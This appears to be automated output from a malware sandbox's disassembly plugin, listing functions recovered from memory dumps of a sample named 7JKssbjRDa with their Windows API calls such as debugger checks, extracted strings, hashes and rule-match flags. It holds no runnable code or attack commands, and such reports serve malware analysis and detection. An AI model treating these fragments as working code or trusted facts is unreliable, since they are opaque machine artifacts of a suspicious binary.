8Hz, xrefs: 0097EBE7
jp, xrefs: 0097E421
9#_y, xrefs: 0097E0E0

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: 8Hz$9#_y$K`'O$jp
API String ID: 0-3238105730
Opcode ID: 91ca9f96a54215030295d8bfd512512769d816b1b4e8cc673f1c5ccc2fcd83fb
Instruction ID: 7080f69a2f8b3f944871798410aea352f3da4947016c9c103a4cc9412f57c273
Opcode Fuzzy Hash: 91ca9f96a54215030295d8bfd512512769d816b1b4e8cc673f1c5ccc2fcd83fb
Instruction Fuzzy Hash: EDB2F2F390C2049FE7047F29EC8567ABBE5EF94320F1A492DEAC587744EA3598048797

Function 004097B2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
IsDebuggerPresent.KERNEL32 ref: 0040988A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49

Function 04B49A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
IsDebuggerPresent.KERNEL32 ref: 04B49AF1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction ID: 3f826736889305ecb234e0bb4f6114a69f31afa50bf0e8fcc6e92b3813a43dd4
Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction Fuzzy Hash: AC311AB5D4121C9BDB20DFA4D989BCDBBB8BF48304F1040EAE409A7250EB715A85DF04

Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
IsDebuggerPresent.KERNEL32 ref: 100030B2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04

Function 04CF2070 Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

`,@, xrefs: 04CF2260
@,@, xrefs: 04CF2259
@, xrefs: 04CF208F
0,@, xrefs: 04CF2252

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: 0,@$@$@,@$`,@
API String ID: 0-1654315312
Opcode ID: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
Instruction ID: 9d04eb5d453bd822a23a1c305b061fc2d574cb9f1f4083cf641312b7c7e43fb5
Opcode Fuzzy Hash: 5b4dbf54bdba94f60b787558392db44d93cafa9daf967c2ab35a05ecdb66b168
Instruction Fuzzy Hash: CA127C71B002159BDB54CF98DD80BADB7B2FF48314F1441AAEA09AB381D77AF941CB94

Function 0097BF2C Relevance: 5.4, Strings: 3, Instructions: 1607COMMON

Download Yara Rule

Strings

dQ#z, xrefs: 0097C2ED
G[{n, xrefs: 0097C1D0
7HK, xrefs: 0097CE22

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: G[{n$dQ#z$7HK
API String ID: 0-1291227519
Opcode ID: 23c57414a0fb55aca8964efbb2b6b5f4d648235ceb23b628d3834597b9485597
Instruction ID: e48b5946c54bbca93841c331694ef87ece72152a3b903550ba5532d8e0b92de4
Opcode Fuzzy Hash: 23c57414a0fb55aca8964efbb2b6b5f4d648235ceb23b628d3834597b9485597
Instruction Fuzzy Hash: 05B2E6F360C2009FE308AE29EC8567ABBE9EF94720F16893DE6C5C7744E63558058797

Function 00985E50 Relevance: 5.3, Strings: 3, Instructions: 1578COMMON

Download Yara Rule

Strings

Yy?W, xrefs: 009865ED
a7~g, xrefs: 00986228
4.}v, xrefs: 00986F30

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: 4.}v$Yy?W$a7~g
API String ID: 0-373724283
Opcode ID: c4366cd40b47e56faba398b014585746b59a383a64342d9dc5e3f132588955fc
Instruction ID: b1c7f2f3361223bebe86c42d4380765ca3ec2b973ed0c07c318919b4bac78e3d
Opcode Fuzzy Hash: c4366cd40b47e56faba398b014585746b59a383a64342d9dc5e3f132588955fc
Instruction Fuzzy Hash: BFB2C3F3A082009FE714AE2DDC8577ABBE5EF94720F1A493DEAC4C3744EA3558418796

Function 0040C0B3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49

Function 04B4C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B4C412
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B4C41C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B4C429

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
Instruction ID: 46b9c7b27c31c4f677a546c9b3137b8e337d51f6eae02f45cfbb35a4547c6502
Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
Instruction Fuzzy Hash: 5831C7B490122CABCB61DF28DD887DDBBB4BF48710F5041EAE41CA7250E770AB859F49

Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44

Function 04B4F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
ExitProcess.KERNEL32 ref: 04B4F1AF

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction ID: 5a0b6906482cab578f04eaf4a73385882b6fb4f46445c91b1b3a9aa926e356b2
Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction Fuzzy Hash: 0FE0B671844118AFDB117F54DD48A993B69FF90685F004464F80587231CB76E991DB94

Function 10005F25 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F47
TerminateProcess.KERNEL32(00000000,?,10005F24,?,?,?,?,?,10001F4F), ref: 10005F4E
ExitProcess.KERNEL32 ref: 10005F60

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
Instruction ID: 146749da7bea6e31057676a24497a7e39fcb2650f4e844f2ac51073fb5c6c599
Opcode Fuzzy Hash: 25e154c42a67dcf87d00edb929b2d1476c3327d7ef7788f8d8e64d02c0ecb1df
Instruction Fuzzy Hash: 02E08631404589EFEF069F10CD4CA993B69FB442C2B008024F50D8A135CB7AEDD1CB41

Function 04B4092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 04B4095F
l, xrefs: 04B40966
GetProcAddress., xrefs: 04B409DC, 04B409DF, 04B409E4

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4

Function 0040F320 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94

Function 04B4F587 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: e80ba316238a52440995120652ccb2ba54186a16ce09c0288fdc6cfb70fcf59f
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: A0F13071E00219DFDF14CFA9D9806ADF7B1FF88324F2582A9D919AB344D731A941DB90

Function 04CFE720 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction ID: bc675e7e2c32dd5d6667c9c947488e9291fc5f904ebab751bcf1799eef5df357
Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
Instruction Fuzzy Hash: 8EF14071E002199FDF54CFA9CC806ADBBF2FF88314F158269D919AB394D735AA01CB94

Function 00985123 Relevance: 3.1, Strings: 2, Instructions: 575COMMON

Download Yara Rule

Strings

),n:, xrefs: 009857B3
s(vV, xrefs: 009857CB

Memory Dump Source

Source File: 00000000.00000002.3028161823.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_819000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: ),n:$s(vV
API String ID: 0-2551381859
Opcode ID: 04208885adfbc31390b3027b3ed0dcc0220c094d85982cdc0d67c8fdcdc55b93
Instruction ID: 7078d49b7fbd613532ea4d564d969eccf9df4eb0e378c4cc4f5aa2fe5b4ee568
Opcode Fuzzy Hash: 04208885adfbc31390b3027b3ed0dcc0220c094d85982cdc0d67c8fdcdc55b93
Instruction Fuzzy Hash: F90204F3A08204AFE7046E1DDC85A7AFBE9EF94720F1A493DEAC483700E63558158693

Function 04D07CAA Relevance: 3.0, APIs: 1, Instructions: 1451COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 04D07E25

Memory Dump Source

Source File: 00000000.00000003.2523875768.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4cf0000_7JKssbjRDa.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
Instruction ID: b350ba3b11178a4c96b06029028249d2d73aeb114f9295d49a1eed172480854c
Opcode Fuzzy Hash: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
Instruction Fuzzy Hash: 9AC23971E046288FDB24DE28DD407A9B7B5FB88315F1485EAE84DE7280E774BE859F40

Function 04D60000 Relevance: 2.8, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

`, xrefs: 04D602D5
aPR, xrefs: 04D6029A

Memory Dump Source

Source File: 00000000.00000002.3032913549.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d60000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: `$aPR
API String ID: 0-1362806648
Opcode ID: c6f2ac960470bd6bd486170696ad62ba3d56b04f2cd9c8b23b58a2df5cab5e50
Instruction ID: d13fdbf6ac01c7b0642ee89349a7ffb680fff710f485b791c61a35b532a6910b
Opcode Fuzzy Hash: c6f2ac960470bd6bd486170696ad62ba3d56b04f2cd9c8b23b58a2df5cab5e50
Instruction Fuzzy Hash: 584128EB34C2617EB153D5462F24EFB676EE5C6734331882AF843C6446F2899E4E2171

Function 00413CE6 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44

Function 04B53F4D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B53F48,?,?,00000008,?,?,04B5AB25,00000000), ref: 04B5417A

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction ID: 851bf4821145136d6815e672a2d621058b53c36e9e3f86bff6807aee8922e64a
Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
Instruction Fuzzy Hash: 84B13F35610605DFDB15CF28C486B65BBE0FF45365F298698E899CF2B2C336E992CB40

Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40

Function 00415D07 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
Instruction ID: 5ef8e782818ac5c356667e56c32e051b370d413b7f744af6f0ed5b3d29dfc074
Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
Instruction Fuzzy Hash: 5141B6B1C04618AFDB24DF69CC89AEABBB8EF85304F1442DEE41DD3211DA359E858F14

Function 04B55F6E Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
Instruction ID: 2a02ed98e1fb0d2dcd136e8a3c24fc4c13b555c0caf67f709e2798379d18ada7
Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
Instruction Fuzzy Hash: 4B41A2B5804218AFDF20DF79CC88BAAFBB8EB45304F5442D9E85DD3210DA35AE858F50

Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3034271041.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3034230472.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034323562.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3034375451.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10

Function 00409949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction Fuzzy Hash:

Function 04B49BB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409955,04B497B6), ref: 04B49BB5

Memory Dump Source

Source File: 00000000.00000002.3032420897.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_7JKssbjRDa.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
Instruction Fuzzy Hash:

Function 0040D3DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 0040D559

Memory Dump Source

Source File: 00000000.00000002.3027894091.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3027894091.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7JKssbjRDa.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E

